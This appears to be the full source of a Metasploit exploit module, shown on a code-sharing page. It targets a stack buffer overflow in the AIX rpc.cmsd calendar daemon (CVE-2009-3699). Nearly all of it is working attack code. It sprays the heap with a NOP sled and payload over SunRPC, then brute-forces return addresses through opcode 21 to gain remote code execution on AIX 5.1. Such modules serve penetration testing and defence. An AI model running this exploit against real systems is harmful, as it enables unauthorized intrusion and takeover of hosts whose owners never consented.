Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::SunRPC
10
  include Msf::Exploit::Brute
11

12
  def initialize(info = {})
13
    super(update_info(info,
14
      'Name'           => 'AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow',
15
      'Description'    => %q{
16
          This module exploits a buffer overflow vulnerability in opcode 21 handled by
17
        rpc.cmsd on AIX. By making a request with a long string passed to the first
18
        argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This
19
        leads to arbitrary code execution.
20

21
        NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where
22
        further attempts are not possible.
23
      },
24
      'Author'         =>
25
        [
26
          'Rodrigo Rubira Branco (BSDaemon)',
27
          'jduck',
28
        ],
29
      'References'     =>
30
        [
31
          [ 'CVE', '2009-3699' ],
32
          [ 'OSVDB', '58726' ],
33
          [ 'BID', '36615' ],
34
          [ 'URL', 'https://web.archive.org/web/20091013155835/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=825' ],
35
          [ 'URL', 'https://web.archive.org/web/20221204155746/http://aix.software.ibm.com/aix/efixes/security/cmsd_advisory.asc' ]
36
        ],
37
      'Platform'       => [ 'aix' ],
38
      'Payload'        =>
39
        {
40
          'Space' => 4104,
41
          'BadChars' => "\x00",
42
          # The RPC function splits the string by 0x40, watch out!
43
          # It's not a payload badchar since we're putting the payload elsewhere...
44
          'DisableNops' => true
45
        },
46
      'Targets'        =>
47
        [
48
          [
49
            'IBM AIX Version 5.1',
50
            {
51
              'Arch'     => 'ppc',
52
              'Platform' => 'aix',
53
              'AIX'      => '5.1',
54
              'Bruteforce' =>
55
              {
56
                'Start' => { 'Ret' => 0x2022dfc8 },
57
                #worked on ibmoz - 'Start' => { 'Ret' => 0x2022e8c8 },
58
                'Stop'  => { 'Ret' => 0x202302c8 },
59
                'Step'  => 600
60
              }
61
            }
62
          ],
63
        ],
64
      'DefaultTarget' => 0,
65
      'DisclosureDate' => '2009-10-07'))
66

67
  end
68

69
  def brute_exploit(brute_target)
70

71
    if not @aixpayload
72
      datastore['AIX'] = target['AIX']
73
      @aixpayload = regenerate_payload.encoded
74
    end
75

76
    print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
77

78
    begin
79
      sunrpc_create('udp', 100068, 4)
80

81
      # spray the heap a bit (work around powerpc cache issues)
82
      buf = make_nops(1024 - @aixpayload.length)
83
      buf << @aixpayload
84
      xdr = Rex::Encoder::XDR.encode(buf, buf)
85
      10.times {
86
        sunrpc_call(7, xdr, 2)
87
      }
88

89
      #print_status("ATTACH DEBUGGER NOW!"); select(nil,nil,nil,5)
90

91
      buf = rand_text_alphanumeric(payload_space)
92
      buf << [brute_target['Ret']].pack('N')
93

94
      xdr = Rex::Encoder::XDR.encode(buf, "")
95
      sunrpc_authunix('localhost', 0, 0, [])
96
      sunrpc_call(21, xdr, 2)
97

98
      handler(sunrpc_callsock)
99
      sunrpc_destroy
100

101
    rescue Rex::Proto::SunRPC::RPCTimeout
102
      vprint_error('RPCTimeout')
103
    rescue Rex::Proto::SunRPC::RPCError => e
104
      vprint_error(e.to_s)
105
    rescue EOFError
106
      vprint_error('EOFError')
107
    end
108
  end
109
end
110

111